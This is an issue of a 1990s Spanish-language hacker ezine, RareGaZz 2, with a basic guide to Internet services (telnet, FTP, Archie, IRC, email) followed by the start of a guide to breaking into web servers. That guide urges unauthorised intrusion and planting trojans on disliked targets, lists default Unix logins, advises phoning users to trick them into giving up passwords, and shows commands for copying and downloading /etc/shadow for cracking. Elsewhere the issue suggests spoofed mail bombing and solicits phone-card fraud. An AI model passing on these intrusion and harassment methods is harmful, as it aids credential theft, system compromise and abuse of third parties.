Copy Link
Add to Bookmark
Report

RareGaZz Issue 02

eZine's profile picture
Published in 
RareGaZz
 · 3 years ago

  

R&GR&GR&GR&GR&GR&GR&GR&GR&GR&GR&R&G
R&G R&G
R&G ıRareGaZzı R&G
R&G <<::La Droga sin Bajon::>> R&G
R&G R&G
R&GR&GR&GR&GR&GR&GR&GR&GR&GR&GR&GR&

Numero 2

En este numero nos enfocamos en la cuestion de la privacidad en
la red y en el hogar con sistemas de encripcion. Ademas echamos
un vistazo a como funcionan los sistemas de la red y que
sistemas operativos operan dando como resultado, 'Hacking
Websites & HomePages' por Le PompeItor.

Para todos aquellos surfeadores empedernidos como nosotros,
incluimos una lista de los mejores websites que ofrezcan algun
servicio a los visitantes y que ademas sea gratuito.

Si quieres estar al tanto de lo que sucede con relacion a
las computadoras en el mundo que gira a tu alrededor basta con
que leas la seccion de NotiLOONS escrita por colaboradores de
esta revista.

La respuesta de ustedes despues del primer numero ha sido
agradable y esperamos seguir contando con buenos textos. Para
lograr esto necesitamos la colaboracion de todos los lectores de
este magaZine.

RareTrip

O
o
RareGaZz ¯

-Articulos-

1- Guia para Internet por Le PompeItor
2- Hacking WebSites & HomePages por Le PompeItor
3- Manual de TCP/IP articulo 2 de 2
4- Sistemas de encripcion por KillerBot
5- Que es PGP? por KillerBot
6- Los 10 mejores Websites por RareTrip
7- Codigos de registro
8- JavaScript para HomePages por KillerBot
9- Trucos para Unix por Shark
10- Seccion de Software
11- NotiLoons

RareGaZz esta escrito por usuarios de la red que lo hacen en forma
anonima y la persona encargada de la edicion de esta revista no se
hace responsable por los da§os fisicos, morales, religiosos, etc.,
que la lectura o los archivos contenidos en este numero originen.
En pocas palabras, si este texto sale de la pantalla mata tu perro
o hace explotar el monitor de tu PC no nos hacemos responsables;-)

Participa enviando textos a las siguientes direcciones:

RARETRIP@CYBERDUDE.COM
RAREGAZZ@BIGFOOT.COM

Los textos que mandes pueden estar encriptados con la siguiente
llave publica para poder verificar el originario del mensaje. Si
el texto lo pirateaste de alguna otra revista por favor menciona
el nombre y numero en que aparecio el texto original.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzNQT8QAAAEEAMW6UQtjaxW/45q4OiG3IeahuKkRgSzIBnzlSlAm88/S1hmA
qUa92gv/Fjy3QiLOVuZW2J00oNNIClnQBwlQ9mDopRKiGnYcdU8Ll7d76WmRttrh
D60AKVXMkEm0wYvp7Xg57Ecbm3Ao4jP3SiP910ID/ukPQOFswbBNiqTF4fXZAAUT
tB9SYXJlR2FaeiA8UmFyZUdhWnpAQmlnZm9vdC5Db20+
=RXuI
-----END PGP PUBLIC KEY BLOCK-----

!!Atencion!!
Se solicitan PHREAKERS para la publicacion de esta revista. Si alguien de
ustedes sabe como hacer llamadas locales o larga distancia gratis desde
cualquier tipo de telefono sea publico o privado mandenos sus trucos y
mencionen bajo que compa§ia funcionan (TelMex/Telnor/Alestra/etc).
Ademas, si alguien sabe como fabricar tarjetas para usar telefonos publicos
esta es su oportunidad para tener clientes por todo Mexico! Hay muchas
formas de recibir el dinero anonimamente para evitar ser sorprendido.
En el numero 3 de RareGaZz se explica como mandar correo electronico
totalmente ANONIMO por si tienen informacion sensible los usen para
comunicarse con nosotros.

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

xx xx xx xx xx xx xx xx xx xx xx xx
xx xx
xx Guia para Internet xx
xx por xx
xx Le PompeItor xx
xx xx
xx xx xx xx xx xx xx xx xx xx xx xx

"Internet es un desastre"
-Usuario sin RareGaZz

"Yo se que Internet es un desastre"
-Usuario con RareGaZz

Introduccion
~~~~~~~~~~~~
Para las personas que estan empezando a distinguir entre WWW y FTP internet
puede parecerles complicado y dificil de navegar por que dedican demasiado
tiempo buscando algun tema y pocas veces lo encuentran. Esto es una verdad
pero, si hicieran uso de los diferentes servicios que ofrece internet, sin
lugar a dudas agilizarian sus movimientos en Internet.
Para eso es esta guia.

1. Nombres de dominio y direcciones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Las direcciones en Internet son tan largas y dificiles de recordar como
128.128.57.83 que si tuvieras que recordarlas necesitarias algo mejor que
un cerebro tipico. Para evitar que tomemos medicamento o radiacion que en
verdad dista de ser confiable, internet ha adquirido los nombres de dominio.
Todos los Host registrados en Internet deben de tener nombres que reflejen
los dominios bajo los que estan registrados. Estos nombres son llamados
'Nombres de Dominios Enteramente Calificados' o 'Fully Qualified Domain
Names'por sus siglas en Ingles (FQDNs).

Ahora examinemos un nombre de Dominio:

lilac.berkeley.edu
^ ^ ^
| | |
| | |____ ``edu'' muestra que este Host es patrocinado por
| | una organizacion educativa. Este es un dominio
| | de el primer nivel.
| |
| |___________ ``berkeley'' es el dominio de segundo nivel, nos
| muestra la ubicacion del dominio. (Berkeley)
|
|
|__________________ ``lilac'' es el dominio de Tercel nivel, indica el
nombre de la computadora HOST.

Este es una lista de los dominios de primer nivel que te encontraras:

|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Dominios de primer nivel comunes |
| |
| COM - empresa comercial (con fines de lucro pues) |
| EDU - institucion educativa |
| GOV - organizacion de gobierno |
| MIL - organizacion militar |
| NET - una red |
| ORG - institucion sin fines de lucro. l
| |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2. Ubicacion Geografica
~~~~~~~~~~~~~~~~~~~~~~~
Para ubicar geograficamente algun dominio hay que prestar atencion al
nombre del dominio y revisar su ultima extension. En el siguiente ejemplo se
puede apreciar mas claramente:

orca.ens.cetys.mx
^ ^ ^ ^
| | | |____ MX = Indica que este servidor se encuentra en MEXICO
| | |_________ CETYS = Institucion Educativa
| |______________ ENS = Indica que se encuentra en ENSENADA
|__________________ ORCA = Nombre de la computadora Host

⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒø
≥ Extensiones Usadas en Dominios ≥
¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ
(copiados de un texto escrito por Gatsby)

-EXTENSION - UBICACION - EJEMPLO-

.AQ New Zealand
.AR Argentina atina.ar
.AT Austria pythia.eduz.univie.ac.at
.BB Barbados
.BE Belgium ub4b.buug.be
.BG Bulgaria
.BO Bolivia unbol.bo
.BR Brazil fpsp.fapesp.br
.BS Bahamas
.BZ Belize
.CA Canada cs.ucb.ca
.CH Switzerland switch.ch
.CL Chile uchdcc.uchile.cl
.CN China ica.beijing.canet.cn
.CR Costa Rica huracan.cr
.CU Cuba
.DE Germany deins.informatik.uni-dortmund.de
.DK Denmark dkuug.dk
.EC Ecuador ecuanex.ec
.ES Espa§a
.EE Estonia kbfi.ee
.EG Egypt
.FI Finland funet.fi
.FJ Fiji
.FR France inria.inria.fr
.GB England
.GR Greece csi.forth.gr
.HK Hong Kong hp9000.csc.cuhk.hk
.HU Hungary sztaki.hu
.IE Ireland nova.ucd.ie
.IL Israel relay.huji.ac.il
.IN India shakti.ernet.in
.IS Iceland isgate.is
.IT Italy deccnaf.infn.it
.JM Jamaica
.JP Japan jp-gate.wide.ad.jp
.KR South Korea kum.kaist.ac.kr
.LK Sri Lanka cse.mrt.ac.lk
.LT Lithuania ma-mii.lt.su
.LV Latvia
.MX Mexico mtec1.mty.itesm.mx
.MY Malaysia rangkom.my
.NA Namibia
.NI Nicaragua uni.ni
.NL Netherlands sering.cwi.nl
.NO Norway ifi.uio.no
.NZ New Zealand waikato.ac.nz
.PE Peru desco.pe
.PG New Guinea ee.unitech.ac.pg
.PH Philippines
.PK Pakistan
.PL Poland
.PR Puerto Rico sun386-gauss.pr
.PT Portugal ptifm2.ifm.rccn.pt
.PY Paraguay ledip.py
.SE Sweden sunic.sunet.se
.SG Singapore nuscc.nus.sg
.SU Russians kremvax.hq.demos.su
.TH Thailand
.TN Tunisia spiky.rsinet.tn
.TR Turkey
.TT Trinidad & Tobago
.TW Taiwan twnmoe10.edu.tw
.UK United Kingdom ess.cs.ucl.ac.uk
.US United States isi.edu
.UY Uruguay seciu.uy
.VE Venezuela
.ZA South Africa hippo.ru.ac.za
.ZW Zimbabwe zimbix.uz.zw


3. Servicios en Internet
~~~~~~~~~~~~~~~~~~~~~~~~

TELNET= Es un tipo de conexion que permite a un cliente usar un servidor
sin estar fisicamente cerca de el. Para manejar un servidor es
necesario el aprendizaje del sistema operativo UNIX.

FTP= Es un protocolo universal de transmision de archivos que permite
intercambiar archivos entre computadoras con distintas
configuraciones.

ARCHIE= Son servidores que permiten realizar busquedas sobre alguna
cadena de texto en la descripcion de algun producto de software, en
caso de encontrarlo se le notifica al usuario que programa
contiene esa linea de texto en su descripcion y le indica donde
puede 'bajarlo'. Las busquedas con archie son un poco complicadas
a menos que cuentes con un programa que las realize en modo grafico
como FpArchie disponible en:
www.zdnet.com/pccomp/freestuff/

IRC= Este servidor te permite conectarte a un servidor IRC y podras
platicar en tiempo real con usuarios de todo el mundo. Si necesitas
informacion especifica sobre algo solo necesitarias entrar a un
'canal' de IRC sobre el tema que andes buscando y preguntar donde
puedes conseguir lo que necesitas e inmediatamente alguien te
contestara seguramente. Los programas para IRC son variados aunque
en verdad es un poco dificil de usar por la sintax de los comandos.
Existe un programa llamado mIRC con interfaz grafica que hace
'ligeramente' mas facil de usar el servicio de IRC. El programa
mIRC es Shareware y lo puedes encontrar e n WWW.SHAREWARE.COM o
WWW.DOWNLOAD.COM, solo escribe mIRC en la maquina de busqueda
bajo la categoria "windows all"

WWW= Para accesar a este tipo de servicios necesitaras un navegador,como
Internet Explorer o Netscape Navigator. La pregunta cual de los 2
es mejor esta muy de moda pero como dicen por ahi "Nunca sigas la
moda"
. En verdad que tienen algunas diferencias pero la verdad
sirven para lo mismo,ademas esta revista es gratuita y sin relacion
comercial con ningun producto.

E-MAIL= El correo electronico es mas rapido y barato que el convencional,
y no tiene ningun dia para festejarlo ( imagina el dia del
servidor de e-mail:-). Con el se pueden accesar algunos servicios
interesantes como las LISTAS DE CORREO que son 'comunidades' en
las que se tratan temas especificos.
Tambien existen servicios para transferir archivos via e-mail en
el dado caso de que un usuario no tenga acceso a FTP podria
de cualquier manera recibir los archivos a su direccion de e-mail.


3.1 Telnet
~~~~~~~~~~~
Los servidores telnet generalmente son bases de datos o BBS donde puedes
platicar en vivo con otras personas y hacer algunas cosas interesantes como
poner mensajes (post) para que los lean los demas usuarios.Algunos servidores
telnet son:

=Super Tip RareGaZz=
Si deseas conectarte via telnet a tu propio servidor haz telnet a:
127.0.0.1
En el login y password escribe tus datos personales y estaras en
el corazon de el sistema que usas para conectarte a Internet. Deberas
usar comandos UNIX para moverte por los directorios.
Si tu servidor tiene una barrera de fuego (firewall) no podras conectarte
via Telnet. A menos que uses un script PERL desde otra terminal UNIX
=Fin de Super Tip=

Cimarron BBS (En espa§ol ) Encontraras platicas y cosas agradables.
131.178.17.60. <--- Si no puedes conectarte intenta: bugs.mty.itesm.mx
Login: BBS
*Nota: Algunas veces no se puede conectar al servidor.

Club Iteso (Mexicano)
club.gdl.iteso.mx

Temas Anti-virus (ingles)
guest@freenet.victoria.bc.ca
cuando se realize la conexion escibe GO VIRUS para ver temas Anti-Virus

American Philosophy Association BBS
atl.calstate.edu
Login: apa

CARL (Base de Datos, Revistas, Revisiones sobre libros, etc)
pac.carl.org

Cheeseplant's House (Platicas en vivo)
137.205.192.5

Chess Server (Juega/Observa juegos de ajedrez)
lark.utah.edu 5000
Escribe "HELP" si necesitas ayuda

Dante Project (Todo sobre el escritor de la Divina Comedia)
library.dartmouth.edu
Login: connect dante

INFO - Rutgers CWIS (CIA World Factbook, Diccionario en Ingles, etc)
hangout.rutgers.edu 98

IRC Telnet (Platicas IRC)
128.2.54.2

Biblioteca del Congreso de los Estados Unidos
192.65.218.43

NASA (Ofrece fechas de lanzamientos, e informacion de los satelites)
128.158.13.250

Software Server (Un servidor de software parecido a ARCHIE)
130.166.2.150 5742

UNC BBS (Acceso a Bibliotecas de la nacion de EUA)
128.109.157.30

Weather Service (Informacion metereologia para los estados o ciudades de EUA)
141.212.196.79 3000

World-Wide Web (Acceso a documentos relacionados con la red)
128.141.201.74


3.1.1 Telnet desde Una terminal Unix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para ingresar a cualquiera de estos servidores basta con que ejecutes el
programa para iniciar una sesion TELNET y escribas el nombre del servidor
HOST. Algunos servidores preguntaran por un Login y deberas escribir el que
aparece en este texto abajo de su direccion.
Algunos comandos para manejar TELNET desde una terminal UNIX son:

TELNET =Este comando te llevara al prompt telnet: telnet>
CLOSE =Cierra la conexion telnet.
DISPLAY =Muestra los parametros operacionales.
OPEN {server}=Abre una conexion telnet.
QUIT =Sale del prompt Telnet.
SEND =Envia algun archivo.
STATUS =Muestra el status de una conexion.
HELP =Muestra el instructivo de Telnet.

3.2 FTP (File Transfer Protocol)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
FTP es una gran herramienta que nos sirve para accesar servidores que cuentan
con una gran cantidad de archivos y los ponen a la disposicion del usuario.Si
usas un programa como WS-FTP.EXE deberas escribir el Login y Password para
poder entrar al servidor, generalmente son:

LOGIN: ANONYMOUS
PASSWORD: {tu direccion internet} o GUEST

Los servidores FTP estan ordenados en directorios con nombres relacionados
a los programas que almacenan. Las utilerias para Internet se encuentran casi
siempre en /PUB/WINSOCK Algunos servidores FTP son:

Software para Internet (/ftp/pub/winsock)
trumpet.com
Login: ANONYMOUS
Password: GUEST

Servidor de Documentos (Varios incluyendo la biblia) >Ingles<
128.32.184.254

Software de Todo tipo (Se recomienda que primero copies INDEX)
oak.oakland.edu
Login: ANONYMOUS
Password: GUEST

Informacion sobre listas de correo, newsgroups, etc.
192.33.33.22

Documentos Internet
ds.internic.net

MagaZines Electronicos (Aun no tienen RareGaZz)
ftp.std.com

3.2.1 FTP desde un prompt Unix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para iniciar una sesion FTP en un servidor que use Unix deberas escribir en
el prompt FTP ejemplo:

( # Simboliza el prompt UNIX y las minusculas son las entradas del usuario )

#ftp
FTP> open oak.oakland.edu <-- Abre conexion
CONNECTED TO OAK.OAKLAND.EDU
LOGIN: anonymous <-- Login como anonymous
PASSWORD: guest <-- Password guest
WELCOME TO OAK.OAKLAND.EDU
FTP>get index <-- Obtener index del servidor
ASCII FILE BLAH BLAH BLAH 100%
FTP>close <-- Cerrar conexion
FTP>quit <-- Salir del prompt FTP

Comandos FTP desde una terminal:

pwd =Muestra el directorio en el que te encuentras.
ls =Es similar a DIR de MS-DOS
ls -a =Muestra los archivos incluyendo aquellos escondidos
cd =cambia de directorio ej. 'cd /etc/winsock'
get =Obtiene un archivo. Ejemplo: FTP> get /pub/virus/natas.zip
cdup =Cambia el directorio a uno mas 'abajo'. Si te encuentras en el
directorio /etc/pub y escribes cdup te encontraras en /etc
cd .. =Igual que el comando anterior.
mdir =Crea un directorio.
rmdir =Elimina un directorio.
close =Cierra la conexion.

3.3 ARCHIE
~~~~~~~~~~
Este es un servicio ofrecido por algunos servidores para localizar archivos
basado en caracteristicas especificas como el nombre, funciones o cualquier
grupo de palabras que describan la funcion del programa.
El servidor se basa en las descripciones de los programas que se encuentran
en una basa de datos y compara las palabras indicadas por el usuario con esa
base y los resultados dependen de la exactitud de las palabras escogidas por
el usuario para describirlo.

3.3.1 Interfaz
~~~~~~~~~~~~~~
La interfaz de este servicio es un poco 'primitiva', ya que el usuario tiene
que usar comandos largos y hacerlo en modo terminal, es decir, frente a un
prompt solamente. El programa que se usa para accesar estos servidores es
TELNET.
Yo he adquirido un programa llamado FpArchie que permite al usuario usar
archie en forma de Ventanas y sin mas problemas. Puedes encontrar este
programa en la siguiente URL:

http://www.zdnet.com/pccomp/freestuff/

3.3.2 Servidores Archie
~~~~~~~~~~~~~~~~~~~~~~~
Para accesar a estos servidores executa el programa TELNET y cuando pregunte
con que Host conectarse puedes escoger uno de los siguientes:

archie.unl.edu
archie.rutgers.edu
archie.mcgill.ca
archie.funet.fi
archie.ans.net

Si deseas buscar mas servidores archie puedes buscar en alguna maquina de
busqueda como infoseek.com, yahoo.com, webcrawler.com, etc. con las palabras
clave de 'archie servers'.

3.3.3 Ejemplo de Busqueda
~~~~~~~~~~~~~~~~~~~~~~~~~
Este es un prompt ejemplo de un servidor archie, los comandos que a
continuacion se usan son reales y puedes tomarlos como un ejemplo.
(No escribas el prompt ">")

> TELNET some.archie.server
Welcome to Archie Server from whatever University Command:
> set search sub (define una busqueda en cadena)
> set pager (detiene la pantalla cuando se llena)
> set maxhits 40 (Maximo 40 resultados)
> prog graficas (Busca programas con la subcadena 'graficas')
ZERO 'graficas' FOUND!
> quit (Para terminar la sesion)

[Editor:Ejemplo de busqueda reproducido de PcComputing a§o 4 Numero 2]

3.4 IRC (Internet Relay Chat)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Con este servicio puedes platicar en vivo con personas de todo el mundo en
tiempo real para compartir consejos, trucos, ideas, bueno ya tienes la idea.
Solo necesitas un programa para conectar a IRC. Existen algunos programas
que permiten usar IRC en modo grafico como mIRC lo que facilita el uso de
este servicio.

3.4.1 COMANDOS
~~~~~~~~~~~~~~
Cuando se conecte a un servidor IRC aparecera la pantalla de introduccion
con alguna informacion sobre el servidor y despues aceptara cualquiera de
los siguientes comandos:

/help Este comando desplegara una lista de comandos basicos.

/list Muestra una lista de los 'canales' a los que te puedes unir para
iniciar una platica.

/join <#canal> Con este comando entras a un cuarto de platicas.

/nick <sobrenombre> Con este comando te asignas un sobrenombre para usar en
los cuartos de platica.

/who <#canal> Despliega en la pantalla los sobrenombres de las personas en
ese cuarto.

/quit Sale del cuarto IRC

3.4.2 Servidores IRC
~~~~~~~~~~~~~~~~~~~~
Yo en lo personal he visto pocos servidores IRC en espa§ol pero estoy seguro
que existen algunos por ahi, solo conozco la direccion de este:

next00.mty.itesm.mx <--Espa§ol
irc.arrakis.es <--Espa§ol
irc.colorado.edut <--Ingles

[Nota del Editor: Algunas Partes de la seccion de IRC incluyendo los
servidores y comandos han sido reproducidos ilegalmente de la revista
Pc Computing Numero 10 a§o 3. Se solicitan servidores IRC en espa§ol!]

7. WWW (World Wide Web)
~~~~~~~~~~~~~~~~~~~~~~~
Internet comenzo a ganar popularidad y usuarios cuando se implemento el
servicio World Wide Web que permitia a los usuarios navegar por internet
mas graficamente gracias al lenguage HTML (Hyper Text Markup Languaje) que
permitia el uso de ligas (links) a distintos lugares de la red evitando asi
el tener que escribir largas direcciones en el modo de una terminal como
antiguamente se acostumbraba hacer.

Un navegador es un programa que permite ver las paginas WWW en forma grafica,
Existen distintos navegadores pero la cima esta dividida en dos productos:

Internet Explorer Windows 3.1
www.microsoft.com/ie/platform/win31msie.htm

Netscape Navigator 2.02 (Recomendado para Windows 3.x)
ftp://ftp2.netscape.com/pub/navigator/2.02/windows

Netscape Navigator 3.0 (Recomendado para Windows 95)
ftp://ftp2.netscape.com/pub/navigator/3.0/windows

-Acomodados en orden alfabetico-

8. E-mail
~~~~~~~~~
El correo electronico es la aplicacion de internet mas usada por su rapidez
de envio, por ser gratuito y por extender la comunicacion a todo el planeta.
En internet no existe el riesgo de una huelga de carteros ya que este
servicio es operado por computadoras.
Ofrece distintos servicios y segun las estadisticas es la aplicacion de
Internet mas usada en todo el mundo.

8.1 Los servicios
~~~~~~~~~~~~~~~~~
Existen servicios disponibles para el correo electronico como FTP, LISTAS DE
CORREO, NEWSGROUPS, entre algunos otros.

8.1.1 FTP
^^^^^^^^^
BITFTP@PUCC.PRINCETON.EDU

Esta es la direccion de un servidor FTP que enviara los archivos que
solicites a tu cuenta de internet codificados UUENCODED Para recibir
una completa lista de comandos disponibles manda un un mensaje con la
siguiente informacion:

Subject:(Presiona Enter)
Mensaje:help (presiona enter) quit

Un mensaje de ejemplo para usar este servicio seria:

------------------------------------------------------------------------------
To: BITFTP3@PUCC.PRINCETON.EDU
From: Some@Loser.net
Subject:
Body:

FTP ftp.winsite.com UUENCODE
USER anonymous
cd /pub/pc/win95/access
get psic9504.zip
QUIT
------------------------------------------------------------------------------

Un mensaje igual al ejemplo tiraria 12736105 megas en la direccion que haya
enviado el mensaje.
Obviamente puedes mandar correo aparentando ser otra direccion para que le
caigan los megas a una persona que no te caiga bien. Para hacer esto sigue
las instrucciones en RareGaZz numero 1.

8.1.2 Listas de correo
^^^^^^^^^^^^^^^^^^^^^^
En las listas de correo existe una relacion entre los miembros para compartir
conocimiento y puntos de vista. Para encontrar una lista de correo que te
interese busca en servidores FTP el archivo LIST_OF_LISTS para encontrar
listas sobre cualquier tema.
Existe un servicio WWW en la direccion http://www.liszt.com que te permite la
busqueda de una lista basado en una palabra o frase en particular. Segun
nuestras busquedas hay pocas listas en espa§ol.

Una lista de correo sobre el tema de la filosofia en espa§ol es:
majordomo-owner@ccc.uba.ar
Para subscribirte envia un mensaje a esta direccion como el siguiente:

To: majordomo-owner@ccc.uba.ar
From: Whoever@you.are
Subject:
Body:

subscribe filosofia Whoever@you.are


Existen algunas listas de correo automaticas que NO permiten la interaccion
sus integrantes, algunas de estas son:

Mercury News (www.merc.com)
Ofrece noticias en mensajes personalizados a la region donde residas. Para
subscribirte visite su pagina e inscribete.(Ver articulo 10 mejores sites)

Cnet News (www.cnet.com)
Es una lista interesante relacionada con las computadoras.Para subscribirte
a esta lista manda un mensaje a DISPATCH@CNET.COM con la siguiente
informacion en el cuerpo del mensaje:

subscribe {direccion de correo electronico}

Shareware (www.shareware.com)
Para enterarte de lo nuevo o popular en shareware subscribete a esta lista
mandando un mensaje a SW-DISPATCH@SHAREWARE.COM con la siguiente linea de
texto en el mensaje:

subscribe shareware-dispatch {direccion de correo electronico}

Listas de correo con Interaccion

majordomo@toad.com (cypherpunks)
Lista dedicada a tratar temas relacionados con Cryptografia, Libertad de
expresion, Programacion, y hasta filosofia. Para inscribirte manda un
mensaje a esta direccion MAJORDOMO@TOAD.COM con la siguiente linea de
texto en el mensaje:

subscribe cypherpunks {direccion de correo electronico}

-Ahora ya podras subscribirte a las listas de correo, pero algunas como
CYPHERPUNKS son de un volumen como de 8 mensajes por dia asi que asegurate
de cancelar tu subscripcion si vas a estar ausente por un periodo de tiempo
mandando un mensaje a la misma direccion con el siguiente mensaje:

unsubscribe cypherpunks {direccion de correo electronico}


9. Newsgroups (Grupos de Noticias)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Los grupos de noticias son algo parecidas a las listas de correo en la
interaccion de los usuarios. Mensajes son puestos en el servidor y se
requiere un software especial para poderlos visualizar; solamente podremos
usar los newsgroups si se cuenta con este servicio proporcionado por su
proveedor de servicio de internet (ISP). Si se cuenta con este servicio
necesitaras un programa como Free Agent disponible en la siguiente URL:

Free Agent
www.forteinc.com/agent/freagent.htm

10. Keep on Hacking
~~~~~~~~~~~~~~~~~~~~
Que les parecio esta guia? espero les guste y la sepan apreciar. Si crees
que puedes hacer algo mejor envialo inmediatemente a esta revista para su
publicacion. Sin envias informacion seras a§adido automaticamente a el
grupo de colaboradores (!)RareDudes(!) y podras recibir software, e
informacion disponible unicamente para los RareDudes.

Le PompeItor

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

Le PomPaItor Presenta *LA GUIA* para

HACKEREAR
WEBSITES & HOMEPAGES
^^^^^^^^^^^^^^^^^^^^^
"Lo espantoso no es la altura, sino la pendiente.
La pendiente donde la mirada se precipita a lo hondo y la mano
se extiende hacia la cumbre. Alli es donde se apodera del corazon
el vertigo de su doble voluntad."
-Federico Nietzsche

1. Introduccion
^^^^^^^^^^^^^^^
Si alguna vez has hechado a volar tu imaginacion se te habra ocurrido que
seria comico remover algunas graficas de algun website, o mejor aun borrar
toda la pagina de algun enemigo para deleitarte con tu venganza. Pues bien,
este es el manual que te ayudara a lograrlo.
Primero deberas entender que andar por ahi borrando paginas es *TONTO* e
inmaduro. Lo que trato de hacer es que sientas la adrenalina de entrar a un
sistema al que no estes autorizado y echar una ojeada alrededor. Si te
dedicas a invadir sistemas y borrar archivos le quitaras el privilegio a
otra persona de entrar a ese sistema ya que el operador se dara cuenta de la
intrusion y aumentaran la seguridad negando asi la entrada a mas 'intrusos'.
Si el sistema al que entraste pertenece a unos hijos de la chingada (Plantas
Nucleares, Creadores de abrigos de piel, Agencias de Gobierno,etc) olvida lo
antes dicho y haz que se arrepientan de haberse conectado a la red causando
kaos o mejor aun, infectandolos con algun buen virus (por que no reemplazar
un ejecutable por un caballo de troya?). En fin, usa tu cabeza y cuida de no
ser sorprendido en tus viajes de kAoS.

2. Websites
~~~~~~~~~~~
Un website es solamente una computadora llamada servidor por su capacidad de
de realizar diferentes tareas al mismo tiempo, ejecutando un sistema
operativo que generalmente sera UNIX o algunas de sus variaciones y con toda
la informacion guardada en algun medio.

2.1 Ganando acceso a un servidor WWW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Aqui reside la magia del Hacker, la proteccion comun son dos preguntas Login
y Password. El usuario que tenga una cuenta en ese servidor tiene un nombre
de usuario (Login) y contrase§a (Password) por lo que la entrada a ese
servidor no tiene problemas; pero para una persona ajena a ese servidor la
entrada es un poco mas complicada.
Para poder penetrar el sistema necesitamos saber su URL y una vez conectados
con el explorador prestar atencion al mensaje waiting reply from 103.38.28
o algo parecido que haga aparecer una direccion IP en lugar de el nombre de
dominio.
Si lograste conseguir la direccion IP usa telnet para conectarte a esa
direccion. Si cuando tratas de conectarte aparece el mensaje 'connection
refused' probablemente este protegida esa direccion con una FIREWALL. Si
este es el caso trata de hacer telnet a el nombre de dominio con la finalidad
de llegar a el frustrante LOGIN/PASSWORD.
Para entrar necesitas conseguir alguna cuenta haciendo algo de ingenieria
social o intenta con los defaults.


* CUENTAS DEFAULTS DE UNIX *

Login: Password:

root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo


Si fracasas al intentar el acceso usando cada uno de los anteriores logins,
probablemente tengas que conseguir el password de otra manera como relaciones
humanas; esto significa que vas a tener que conseguir la clave valiendote de
trucos como hablar por telefono a una persona que sepas que esta registrada
en ese servidor y pedirle su Login y Password diciendo que necesitas validar
su cuenta o algo parecido. Otra manera de conseguir un Password es crear un
programa que robe las claves de acceso del disco duro de una persona.

3. Cuando se esta adentro
~~~~~~~~~~~~~~~~~~~~~~~~~
Una vez que hayas logrado entrar a un sistema necesitaras localizar y obtener
el archivo passwd disponible en el directorio /etc

Para obtener el archivo PASSWD usa el siguiente ejemplo:
($ simboliza el prompt UNIX)

$ ftp
FTP> get /etc/passwd
FTP> quit

Para ver el contenido de el archivo usa el siguiente comando:

$ cat /etc/passwd

Una vez que tengas en tu posesion el archivo PASSWD editalo y fijate en su
contenido, debera tener la siguiente informacion:

usuario:contrase§a:ID:Grupo:descripcion/nombre:directorio:shell

usuario - Este es el login de algun usuario.
contrase§a - Es el password de el usuario (encriptada con DES)
ID - Es la identificacion de ese usuario.
grupo - El grupo al que pertenece esta cuenta.
descripcion- El nombre del usuario.
directorio - El directorio de acceso de el usuario.
shell - El shell que procesa los comandos de ese usuario.

Un ejemplo podria ser:

john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john

Nombre de usuario: john
Password encriptado: 234abc56
Usuario numero: 9999
Numero de grupo: 13
Descripcion: John Johnson
Directorio de acceso: /home/dir/john
Shell: /bin/john

Si el archivo que conseguiste contiene la misma informacion pero en el campo
del password tiene un asterisco (*) o cualquier otro caracter, significa que
las contrase§as se encuentran 'sombreadas'.
Si las contrase§as se encuentra sombreada,las podras encontrar en el archivo
shadow aunque generalmente no se puede tener acceso a ese archivo a menos de
tener root. Una forma de conseguir SHADOW es usando el comando cp para
copiarlo a otro archivo y despues tratar de obtener el archivo al que se
copio, ejemplo:

$cp /etc/shadow /usuarios/carlos/hack.txt
$ftp
FTP> get /usuarios/carlos/hack.txt
FTP> quit
$rd /usuarios/carlos/hack.txt

Algunas otras maneras de obtener el archivo SHADOW seran explicadas en otros
numeros de RareGaZz.

Ya tengo los passwords encriptados, ahora que?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Los passwords estan encriptados usando one-way encription, significa que no
se pueden des-encriptar. Lo que Unix hace es obtener la contrase§a del
usuario,la encripta y la compara con la que ya esta encriptada, si coinciden
entonces se le permite el acceso.

Para poder obtener las contrase§as es necesario tener un archivo con palabras
y usar un programa para que encripte las palabras del archivo y las compare
con las contrase§as encriptadas,si coinciden te avisa que palabra fue la que
coincidio con la contrase§a encriptada.
Algunos programas de este tipo son:

Nombre Palabras por Segundo Computadora

John the Ripper 5077 586
Starcracker 1300 586
